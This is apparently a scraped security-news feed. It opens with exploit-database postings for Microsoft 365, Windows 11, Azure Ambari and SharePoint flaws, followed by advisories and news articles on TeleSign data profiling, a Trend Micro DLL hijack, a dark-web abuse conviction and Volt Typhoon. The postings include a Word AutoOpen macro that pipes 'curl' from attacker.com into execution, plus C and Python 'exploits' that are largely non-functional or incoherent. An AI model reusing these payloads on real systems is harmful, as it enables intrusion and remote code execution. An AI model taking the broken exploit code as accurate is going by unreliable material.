Microsoft 365 MSO version 2305 build 16.0.16501.20074 suffers from a remote code execution vulnerability.

    ## Title: Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074)64-bit Remote Code Execution Vulnerability## Author: nu11secur1ty## Date: 04.17.2023## Vendor: https://www.microsoft.com/## Software: https://www.microsoft.com/en-us/microsoft-365/## Reference: https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/## CVE-2023-28285## Description:The attack itself is carried out locally by a user with authenticationto the targeted system. An attacker could exploit the vulnerability byconvincing a victim, through social engineering, to download and opena specially crafted file from a website which could lead to a localattack on the victim's computer. The attacker can trick the victim toopen a malicious web page by using a malicious `Word` file for`Office-365 API`. After the user will open the file to read it, fromthe API of Office-365, without being asked what it wants to activate,etc, he will activate the code of the malicious server, which he willinject himself, from this malicious server. Emedietly after thisclick, the attacker can receive very sensitive information! For bankaccounts, logs from some sniff attacks, tracking of all the traffic ofthe victim without stopping, and more malicious stuff, it depends onthe scenario and etc.STATUS: HIGH Vulnerability[+]Exploit:The exploit server must be BROADCASTING at the moment when the victimhit the button of the exploit![+]PoC:```cmdSub AutoOpen()    Call Shell("cmd.exe /S /c" & "curl -shttp://attacker.com/CVE-2023-28285/PoC.debelui | debelui",vbNormalFocus)End Sub```## FYI:The PoC has a price and this report will be uploaded with adescription and video of how you can reproduce it only.## Reproduce:[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-28285)## Proof and Exploit[href](https://www.nu11secur1ty.com/2023/04/cve-2023-28285-microsoft-office-remote.html)## Time spend:01:30:00-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ andhttps://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>

Microsoft 365 MSO 2305 Build 16.0.16501.20074 Remote Code Execution

Microsoft Microsoft Windows 11 version 22h2 suffers from a kernel privilege escalation vulnerability.

    // Exploit Title: Windows 11 22h2 - Kernel Privilege Elevation// Date: 2023-06-20// country: Iran// Exploit Author: Amirhossein Bahramizadeh// Category : webapps// Vendor Homepage:// Tested on: Windows/Linux// CVE : CVE-2023-28293#include <windows.h>#include <stdio.h>// The vulnerable driver file nameconst char *driver_name = "vuln_driver.sys";// The vulnerable driver device nameconst char *device_name = "\\\\.\\VulnDriver";// The IOCTL code to trigger the vulnerability#define IOCTL_VULN_CODE 0x222003// The buffer size for the IOCTL input/output data#define IOCTL_BUFFER_SIZE 0x1000int main(){    HANDLE device;    DWORD bytes_returned;    char input_buffer[IOCTL_BUFFER_SIZE];    char output_buffer[IOCTL_BUFFER_SIZE];    // Load the vulnerable driver    if (!LoadDriver(driver_name, "\\Driver\\VulnDriver"))    {        printf("Error loading vulnerable driver: %d\n", GetLastError());        return 1;    }    // Open the vulnerable driver device    device = CreateFile(device_name, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);    if (device == INVALID_HANDLE_VALUE)    {        printf("Error opening vulnerable driver device: %d\n", GetLastError());        return 1;    }    // Fill the input buffer with data to trigger the vulnerability    memset(input_buffer, 'A', IOCTL_BUFFER_SIZE);    // Send the IOCTL to trigger the vulnerability    if (!DeviceIoControl(device, IOCTL_VULN_CODE, input_buffer, IOCTL_BUFFER_SIZE, output_buffer, IOCTL_BUFFER_SIZE, &bytes_returned, NULL))    {        printf("Error sending IOCTL: %d\n", GetLastError());        return 1;    }    // Print the output buffer contents    printf("Output buffer:\n%s\n", output_buffer);    // Unload the vulnerable driver    if (!UnloadDriver("\\Driver\\VulnDriver"))    {        printf("Error unloading vulnerable driver: %d\n", GetLastError());        return 1;    }    // Close the vulnerable driver device    CloseHandle(device);    return 0;}BOOL LoadDriver(LPCTSTR driver_name, LPCTSTR service_name){    SC_HANDLE sc_manager, service;    DWORD error;    // Open the Service Control Manager    sc_manager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);    if (sc_manager == NULL)    {        return FALSE;    }    // Create the service    service = CreateService(sc_manager, service_name, service_name, SERVICE_ALL_ACCESS, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, driver_name, NULL, NULL, NULL, NULL, NULL);    if (service == NULL)    {        error = GetLastError();        if (error == ERROR_SERVICE_EXISTS)        {            // The service already exists, so open it instead            service = OpenService(sc_manager, service_name, SERVICE_ALL_ACCESS);            if (service == NULL)            {                CloseServiceHandle(sc_manager);                return FALSE;            }        }        else        {            CloseServiceHandle(sc_manager);            return FALSE;        }    }    // Start the service    if (!StartService(service, 0, NULL))    {        error = GetLastError();        if (error != ERROR_SERVICE_ALREADY_RUNNING)        {            CloseServiceHandle(service);            CloseServiceHandle(sc_manager);            return FALSE;        }    }    CloseServiceHandle(service);    CloseServiceHandle(sc_manager);    return TRUE;}BOOL UnloadDriver(LPCTSTR service_name){    SC_HANDLE sc_manager, service;    SERVICE_STATUS status;    DWORD error;    // Open the Service Control Manager    sc_manager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);    if (sc_manager == NULL)    {        return FALSE;    }    // Open the service    service = OpenService(sc_manager, service_name, SERVICE_ALL_ACCESS);    if (service == NULL)    {        CloseServiceHandle(sc_manager);        return FALSE;    }    // Stop the service    if (!ControlService(service, SERVICE_CONTROL_STOP, &status))    {        error = GetLastError();        if (error != ERROR_SERVICE_NOT_ACTIVE)        {            CloseServiceHandle(service);            CloseServiceHandle(sc_manager);            return FALSE;        }    }    // Delete the service    if (!DeleteService(service))    {        CloseServiceHandle(service);        CloseServiceHandle(sc_manager);        return FALSE;    }    CloseServiceHandle(service);    CloseServiceHandle(sc_manager);    return TRUE;}

Microsoft Windows 11 22h2 Kernel Privilege Escalation

Azure Apache Ambari version 2302250400 suffers from a spoofing vulnerability.

    # Exploit Title: Azure Apache Ambari 2302250400 - Spoofing# Date: 2023-06-23# country: Iran# Exploit Author: Amirhossein Bahramizadeh# Category : Remote# Vendor Homepage:MicrosoftApache AmbariMicrosoft azure Hdinsights# Tested on: Windows/Linux# CVE : CVE-2023-23408import requests# Set the URL and headers for the Ambari web interfaceurl = "https://ambari.example.com/api/v1/clusters/cluster_name/services"headers = {"X-Requested-By": "ambari", "Authorization": "Basic abcdefghijklmnop"}# Define a function to validate the headersdef validate_headers(headers):    if "X-Requested-By" not in headers or headers["X-Requested-By"] != "ambari":        return False    if "Authorization" not in headers or headers["Authorization"] != "Basic abcdefghijklmnop":        return False    return True# Define a function to send a request to the Ambari web interfacedef send_request(url, headers):    if not validate_headers(headers):        print("Invalid headers")        return    response = requests.get(url, headers=headers)    if response.status_code == 200:        print("Request successful")    else:        print("Request failed")# Call the send_request function with the URL and headerssend_request(url, headers)

Azure Apache Ambari 2302250400 Spoofing

MCL-Net version 4.3.5.8788 suffers from an information disclosure vulnerability.

    # Exploit Title: MCL-Net 4.3.5.8788 - Information Disclosure# Date: 5/31/2023# Exploit Author: Victor A. Morales, GM Sectec Inc.# Vendor Homepage: https://www.mcl-mobilityplatform.com/net.php# Version: 4.3.5.8788 (other versions may be affected)# Tested on: Microsoft Windows 10 Pro# CVE: CVE-2023-34834Description:Directory browsing vulnerability in MCL-Net version 4.3.5.8788 webserver running on default port 5080, allows attackers to gain sensitive information about the configured databases via the "/file" endpoint.Steps to reproduce:1. Navigate to the webserver on default port 5080, where "Index of Services" will disclose directories, including the "/file" directory. 2. Browse to the "/file" directory and database entry folders configured3. The "AdoInfo.txt" file will contain the database connection strings in plaintext for the configured database. Other files containing database information are also available inside the directory.

MCL-Net 4.3.5.8788 Information Disclosure

Microsoft SharePoint Enterprise Server 2016 suffers from a spoofing vulnerability.

    // Exploit Title: Microsoft SharePoint Enterprise Server 2016 - Spoofing// Date: 2023-06-20// country: Iran// Exploit Author: Amirhossein Bahramizadeh// Category : Remote// Vendor Homepage:// Microsoft SharePoint Foundation 2013 Service Pack 1// Microsoft SharePoint Server Subscription Edition// Microsoft SharePoint Enterprise Server 2013 Service Pack 1// Microsoft SharePoint Server 2019// Microsoft SharePoint Enterprise Server 2016// Tested on: Windows/Linux// CVE : CVE-2023-28288#include <windows.h>#include <stdio.h>// The vulnerable SharePoint server URLconst char *server_url = "http://example.com/";// The URL of the fake SharePoint serverconst char *fake_url = "http://attacker.com/";// The vulnerable SharePoint server file nameconst char *file_name = "vuln_file.aspx";// The fake SharePoint server file nameconst char *fake_file_name = "fake_file.aspx";int main(){    HANDLE file;    DWORD bytes_written;    char file_contents[1024];    // Create the fake file contents    sprintf(file_contents, "<html><head></head><body><p>This is a fake file.</p></body></html>");    // Write the fake file to disk    file = CreateFile(fake_file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);    if (file == INVALID_HANDLE_VALUE)    {        printf("Error creating fake file: %d\n", GetLastError());        return 1;    }    if (!WriteFile(file, file_contents, strlen(file_contents), &bytes_written, NULL))    {        printf("Error writing fake file: %d\n", GetLastError());        CloseHandle(file);        return 1;    }    CloseHandle(file);    // Send a request to the vulnerable SharePoint server to download the file    sprintf(file_contents, "%s%s", server_url, file_name);    file = CreateFile(file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);    if (file == INVALID_HANDLE_VALUE)    {        printf("Error creating vulnerable file: %d\n", GetLastError());        return 1;    }    if (!InternetReadFileUrl(file_contents, file))    {        printf("Error downloading vulnerable file: %d\n", GetLastError());        CloseHandle(file);        return 1;    }    CloseHandle(file);    // Replace the vulnerable file with the fake file    if (!DeleteFile(file_name))    {        printf("Error deleting vulnerable file: %d\n", GetLastError());        return 1;    }    if (!MoveFile(fake_file_name, file_name))    {        printf("Error replacing vulnerable file: %d\n", GetLastError());        return 1;    }    // Send a request to the vulnerable SharePoint server to trigger the vulnerability    sprintf(file_contents, "%s%s", server_url, file_name);    if (!InternetReadFileUrl(file_contents, NULL))    {        printf("Error triggering vulnerability: %d\n", GetLastError());        return 1;    }    // Print a message indicating that the vulnerability has been exploited    printf("Vulnerability exploited successfully.\n");    return 0;}BOOL InternetReadFileUrl(const char *url, HANDLE file){    HINTERNET internet, connection, request;    DWORD bytes_read;    char buffer[1024];    // Open an Internet connection    internet = InternetOpen("Mozilla/5.0 (Windows NT 10.0; Win64; x64)", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);    if (internet == NULL)    {        return FALSE;    }    // Connect to the server    connection = InternetConnect(internet, fake_url, INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);    if (connection == NULL)    {        InternetCloseHandle(internet);        return FALSE;    }    // Send the HTTP request    request = HttpOpenRequest(connection, "GET", url, NULL, NULL, NULL, 0, 0);    if (request == NULL)    {        InternetCloseHandle(connection);        InternetCloseHandle(internet);        return FALSE;    }    if (!HttpSendRequest(request, NULL, 0, NULL, 0))    {        InternetCloseHandle(request);        InternetCloseHandle(connection);        InternetCloseHandle(internet);        return FALSE;    }    // Read the response data    while (InternetReadFile(request, buffer, sizeof(buffer), &bytes_read) && bytes_read > 0)    {        if (file != NULL)        {            // Write the data to disk            if (!WriteFile(file, buffer, bytes_read, &bytes_read, NULL))            {                InternetCloseHandle(request);                InternetCloseHandle(connection);                InternetCloseHandle(internet);                return FALSE;            }        }    }    InternetCloseHandle(request);    InternetCloseHandle(connection);    InternetCloseHandle(internet);    return TRUE;}

Microsoft SharePoint Enterprise Server 2016 Spoofing

Input Validation vulnerability in Apache Software Foundation Apache Airflow ODBC Provider, Apache Software Foundation Apache Airflow MSSQL Provider.This vulnerability is considered low since it requires DAG code to use `get_sqlalchemy_connection` and someone with access to connection resources specifically updating the connection to exploit it.

This issue affects Apache Airflow ODBC Provider: before 4.0.0; Apache Airflow MSSQL Provider: before 3.4.1.

It is recommended to upgrade to a version that is not affected



Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2023-35798

**Apache Airflow ODBC Provider, Apache Airflow MSSQL Provider Improper Input Validation vulnerability**

Moderate severity GitHub Reviewed Published Jun 27, 2023 to the GitHub Advisory Database • Updated Jun 30, 2023

**Package**

pip apache-airflow-providers-microsoft-mssql (pip)

**Affected versions**

< 3.4.1

pip apache-airflow-providers-odbc (pip)

**Description**

Published to the GitHub Advisory Database

Jun 27, 2023

Last updated

Jun 30, 2023

GHSA-q57w-826p-46jr: Apache Airflow ODBC Provider, Apache Airflow MSSQL Provider Improper Input Validation vulnerability

Categories: News
Categories: Personal
Categories: Privacy
Tags: BICS

Tags:  Proximus

Tags:  TeleSign

Tags:  TikTok

Tags:  trust score

Tags:  data

A digital rights and privacy organization has filed a complaint against software company TeleSign for gathering and selling information on millions of mobile phone users.



(Read more...)




The post Software company accused of illegally profiling millions of mobile phone users appeared first on Malwarebytes Labs.

A digital rights and privacy organization has filed a complaint against software company TeleSign for gathering and selling information on millions of mobile phone users.

The organization that filed the complaint is nyob. nyob is an Austrian based digital right organization that focusses on commercial privacy issues on a European level. After the General Data Protection Regulation (GDPR) came into force on May 25, 2018, commercial privacy violations can now be enforced on a European level, which allows for much more effective procedures and strategic litigation.

The complaint targets BICS, TeleSign, and Proximus. BICS is a Belgium-based communications service that enables phone calls, roaming, and data flows between different communications networks and services all over the world (500 mobile operators in more than 200 countries). Instead of having direct agreements with each other, hundreds of mobile phone providers can connect their networks through the interconnection service of BICS.

TeleSign is a US-based company that provides Application Programming Interfaces (APIs) that deliver user verification, digital identity, and omnichannel communications, to help other brands with secure onboarding, maintain account integrity, prevent fraud, and streamline omnichannel engagement. Among its customers are Ubisoft, ByteDance (TikTok), Skype, and Salesforce. 

Proximus is the Belgium based parent company of both BICS and TeleSign.

**The problem**

When processing phone customer data, BICS gets detailed information like the regularity of completed calls, call duration, long-term inactivity, range activity, and successful incoming traffic. And it receives these data for about half of the worldwide mobile phone users.

In 2022, Belgian newspaper Le Soir published an article about BICS sharing these data with TeleSign. Based on these data, TeleSign gave every mobile phone user a “trust score” between 0 and 300 points. This trust score helps their customers decide whether to allow users to sign up to a platform or, for example, require an SMS verification first.

According to Telesign’s website, it verifies over five billion unique phone numbers a month, representing half of the world’s mobile users, and provides critical insight into the remaining billions.

The data BICS shares includes information such as the type of technology used to make calls or texts, the frequency of activity, and the duration of calls.

nyob co-founder Max Schrems said:

> “Your phone provider likely forwards data to BICS who then forwards it to TeleSign. TeleSign generates a ‘trust score’ about you and sells phone data to third parties like Microsoft, Salesforce or TikTok  – without anyone being informed or giving consent.”

While GDPR allows for sharing data for the purposes of taking appropriate, proportionate, preventive and curative measure and in order to detect fraud and malicious use of networks and services, nyob feels that this is not the case here.

From Max Schrems:

> “The responses received by BICS and TeleSign suggest that this business model is not complying with EU privacy laws. We have therefore filed a complaint with the Belgian Data Protection Authority, who is competent for Proximus,  BICS and TeleSign.”

The lawsuit could end up to be very costly. The Belgian Data Protection Authority (DPA) can issue a fine up to 4% of the global turnover of Proximus, which is roughly $250 million.

EU citizens that want to know whether TeleSign has data on them, and has assigned them a score like the complainants, nyob has developed a template that you can use to send an access request to TeleSign. Companies holding data about you have the obligation under GDPR to tell you not just whether they process information about you, but also where they received the data, for which purpose they use it, and with whom they shared it.

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Software company accused of illegally profiling millions of mobile phone users

Trend Micro Security 2021, 2022, and 2023 (Consumer) are vulnerable to a DLL Hijacking vulnerability which could allow an attacker to use a specific executable file as an execution and/or persistence mechanism which could execute a malicious program each time the executable file is started.

**LAST UPDATED: MAY 16, 2023**

**Release Date:** March 28, 2023

**CVE Vulnerability Identifier:** CVE-2023-28929

**Platform(s):** Microsoft Windows

**CVSS:** 3.1

**Scores:** 8.6: AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

**Severity Rating:** Medium

**Summary**

Trend Micro has released an update via ActiveUpdate for the Trend Micro Security for Windows family of consumer products (2021,2022, and 2023) which resolves a DLL hijacking vulnerability.

**Affected version(s)**

PRODUCT

AFFECTED VERSION(S)

PLATFORM

LANGUAGE(S)

Trend Micro Security

2022/2023 (17.7.1476 and below)

Microsoft Windows

English

Trend Micro Security

2021 (17.0.1412 and below)

Microsoft Windows

English

**Solution**

Trend Micro has released an update via ActiveUpdate for each version below that resolves the issue.

PRODUCT

APPLICABLE VERSION(S)

PLATFORM

LANGUAGE(S)

Trend Micro Security

2022/2023 (17.7.1634 and below)

Microsoft Windows

English

Trend Micro Security

2021 (17.0.1426 and below)

Microsoft Windows

English

**Vulnerability Details**

Trend Micro Security 2021, 2022, and 2023 (Consumer) are vulnerable to a DLL Hijacking vulnerability which could allow an attacker to use a specific executable file as an execution and/or persistence mechanism which could execute a malicious program each time the executable file is started.

Trend Micro has received no reports nor is aware of any actual attacks against the affected product related to this vulnerability at this time.

**Acknowledgement**

Trend Micro would like to thank the following individuals for responsibly disclosing the issue and working with Trend Micro to help protect our customers:

*   Nippon Telegraph and Telephone Corporation, NTT Security (Japan) KK, NTT DATA Corporation
    *   Rintaro Fujita
    *   Hiroki Hada
    *   Hiroki Mashiko

**Additional Assistance**

Customers who have questions are encouraged to contact Trend Micro Technical Support for further assistance.

How helpful was this article?

*   It wasn't helpful at all.
*   Somewhat helpful.
*   Just okay.
*   It was somewhat helpful.
*   It was helpful.

*   \*Feedback submitted will only be used as reference for future product, service and article improvements.

CVE-2023-28929: Security Bulletin: Trend Micro Security DLL Hijacking

By Deeba Ahmed
Closure for victims?
This is a post from HackRead.com Read the original post: NHS Psychiatrist Jailed; Dark Web Forum and 7,000 Images Seized

**Dr. Kabir Garg was administering “The Annex,” a notorious dark web platform for child sexual abuse, which had over 30,000 registered members.**

An Indian psychiatrist who worked at South London and Maudsley NHS Trust has been sentenced to six years in prison for his involvement in a large-scale dark web child sexual abuse scandal. He was arrested by the UK’s National Crime Agency (NCA) in November 2022.

**The Annex**

According to the NCA, 33-year-old Kabir Garg from Lewisham, London moderated a dark web chat site called The Annex, which boasted 90,000 members worldwide.

He was responsible for sharing hundreds of links to indecent images of children daily on this site, maintaining decorum, and helping other visitors how to share images on the forum and evade law enforcement. Members of the site used the Tor anonymity browser to access the platform.

Kabir Garg: Image Courtesy National Crime Agency

**A Shocking Crime!**

The special prosecutor for the Crown Prosecution Service’s Organised Child Sexual Abuse Unit, Bethany Raine, claimed that it was a shocking crime, considering that Garg was an NHS psychiatrist whose primary duty was to treat vulnerable members of society. He should have understood the devastating impact of sexual abuse on children’s psyche.

**Thousands of Indecent Images Uncovered**

When the NCA searched his apartment, they recovered several devices, including a laptop and an SD card, from which they found around 7,000 indecent images. Out of these, 522 were category A images, which is the most serious category of indecent material.

In addition, they discovered medical journals and articles on the psychological impact of sexual abuse on children, with titles such as “Puberty and Adolescent Sexuality,” “Effects and Aftermath of Rape,” and “A Study on Child Abuse in India.” This indicates that Garg was well aware of the impact of his actions on children.

**Accused Pleaded Guilty**

At the hearing on January 9th, the accused pleaded guilty to one count of facilitating the exploitation of children, three counts of sharing indecent images of children, one count of possessing prohibited images of children, and three counts of making indecent images of children. Raine stated that, given the evidence recovered from his residence, Garg had no choice but to plead guilty, and such platforms should not have any place in society.

According to the Crown Prosecution Service press release, the Woolwich Crown Court sentenced Garg on June 23rd, and he was jailed on Friday. Garg will be registered as a sex offender for life and will also be subject to a Serious Harm Prevention Order.

Profile of Kabir Garg

**A Sigh of Relief**

After Garg’s sentencing, the NHS Foundation Trust released a statement hoping that it might bring a “sense of justice and closure” to the victims of his “deplorable actions.”

On the other hand, the General Medical Council has temporarily suspended Garg until the results of a full GMC investigation are received. Once the results arrive, the GMC will decide whether to refer this case to a full tribunal hearing to determine Garg’s fate as a doctor.

Thankfully, the Annex is now defunct. It was revealed that during its active period, it had 30 administrators. Garg was initially a member and became a moderator after impressing the admins with his dedication and “hard work”. He completed his MBBS from King George Medical University, Lucknow, and worked for the National Institute of Mental Health and Neurosciences before moving to the UK.

1.  Authorities seize world’s biggest dark web child abuse site
2.  100,000 Hacked ChatGPT Accounts Discovered on Dark Web
3.  Unreleased Music Stolen and Sold on Dark Web: Hacker Fined
4.  Microsoft sued for alleged misuse of stolen Dark Web credentials
5.  Google’s Latest Android Feature Drop: Dark Web Search for Gmail ID

NHS Psychiatrist Jailed; Dark Web Forum and 7,000 Images Seized

A recent campaign shows that the politically motivated threat actor has more tricks up its sleeve than previously known, targeting an old RCE flaw and wiping logs to cover their tracks.

_Editor's Note: This article was updated on 7/3/2023 to clarify that_ _CVE-2021-40539_ _was patched in Sept. 2021._

The recently discovered Chinese state-backed advanced persistent threat (APT) "Volt Typhoon," aka "Vanguard Panda," has been spotted using a two-year old critical vulnerability in Zoho's ManageEngine ADSelfService Plus, a single sign-on and password management solution. And it's now sporting plenty of previously undisclosed stealth mechanisms.

Volt Typhoon came to the fore last month, thanks to joint reports from Microsoft and various government agencies. The reports highlighted the group's infection of critical infrastructure in the Pacific region, to be used as a possible future beachhead in the event of conflict with Taiwan.

The reports detailed a number of Volt Typhoon's tactics, techniques, and procedures (TTPs), including its use of internet-exposed Fortinet FortiGuard devices for initial intrusion, and the hiding of network activity via compromised routers, firewalls, and VPN hardware.

But a recent campaign outlined by CrowdStrike in a recent blog post suggests that Volt Typhoon is flexible, with the ability to customize its tactics based on data gathered through extensive reconnaissance. In this case, the group utilized CVE-2021-40539 in ManageEngine for intrusion, then masked its Web shell as a legitimate process and erased logs as it went along.

These previously unknown tactics enabled "pervasive access to the victim's environment for an extended period," says Tom Etheridge, chief global professional services officer for CrowdStrike, which didn't reveal details on the victim's location or profile. "They were familiar with the infrastructure that the customer had, and they were diligent about cleaning up their tracks."

**Volt Typhoon's Evolving Cyber Tactics**

CrowdStrike researchers' spidey senses tingled when suspicious activity seemed to be emanating from its unidentified client's network.

The then-unrecognized entity appeared to be performing extensive information-gathering — testing network connectivity, listing processes, gathering user information, and much more. It "indicated a familiarity with the target environment, due to the rapid succession of their commands, as well as having specific internal hostnames and IPs to ping, remote shares to mount, and plaintext credentials to use for \[Windows Management Instrumentation\]," the researchers wrote in their blog post.

It turned out, after some investigating, that the attacker — Volt Typhoon — had deployed a webshell to the network a whole six months prior. How did it go unnoticed for so long?

The story began with CVE-2021-40539, a critical (9.8 CVSS score) remote code execution (RCE) vulnerability in ADSelfService Plus, discovered and patched back in Sept. 2021. ManageEngine software, and ADSelfService Plus in particular, has been critically exposed on a number of occasions in recent years (CVE-2021-40539 isn't even its most recent critical 9.8 CVSS RCE vulnerability — that title goes to CVE-2022-47966).

With initial access, the attackers were able to drop a Web shell. Here was where the more interesting stealth began, as the researchers observed "the webshell was attempting to masquerade as a legitimate file of ManageEngine ADSelfService Plus by setting its title to ManageEngine ADSelfService Plus and adding links to legitimate enterprise help desk software."

The group proceeded to siphon administrator credentials and move laterally in the network. It took a cruder, manual approach to covering its tracks this time around, going to "extensive lengths to clear out multiple log files and remove excess files from disk," the researchers explained.

The evidence tampering was extensive, nearly eliminating all traces of malicious activity. However, the attackers forgot to erase the Java source code and compiled Class files from their targeted Apache Tomcat Web server.

"If it wasn't for that slight slip up that was reported in the blog, they probably would have gone unnoticed," Etheridge says.

**How to Defend Against Volt Typhoon Cyberattacks**

Thus far, Volt Typhoon has been observed targeting organizations in the communications, manufacturing, utility, transportation, construction, maritime, government, information technology, and education sectors. It's most notable, however, for seeking out critical infrastructure in the United States and Guam — a strategic point of American defense of Taiwan against China.

According to Etheridge, some of the same principles in this case study could be equally applied to a critical infrastructure breach. "Operational technology (OT)-type environments are typically targeted through IT infrastructure first, before the threat actor moves to the infrastructure," he points out. "Certainly the tactics that we see them deploying would be concerning from a critical infrastructure perspective."

To meet the threat of Volt Typhoon, Etheridge says, one major point is identity management.

"Identity is a huge challenge for a lot of organizations. We've seen a huge uptick in advertisements for stolen credentials, and stolen credentials are leveraged quite extensively in the incidents that we respond to each and every day," he says. In this case, being able to leverage stolen credentials was key to Volt Typhoon's remaining under the radar for so many months.

Etheridge also emphasizes the importance of threat hunting and incident response. Nation-state threat actors are notoriously impossible to stop entirely, but organizations will be better prepared to mitigate the worst possible consequences, he says, if they're able "to understand when something is going on in your environment, and being able to take corrective action quickly."

Tag

#microsoft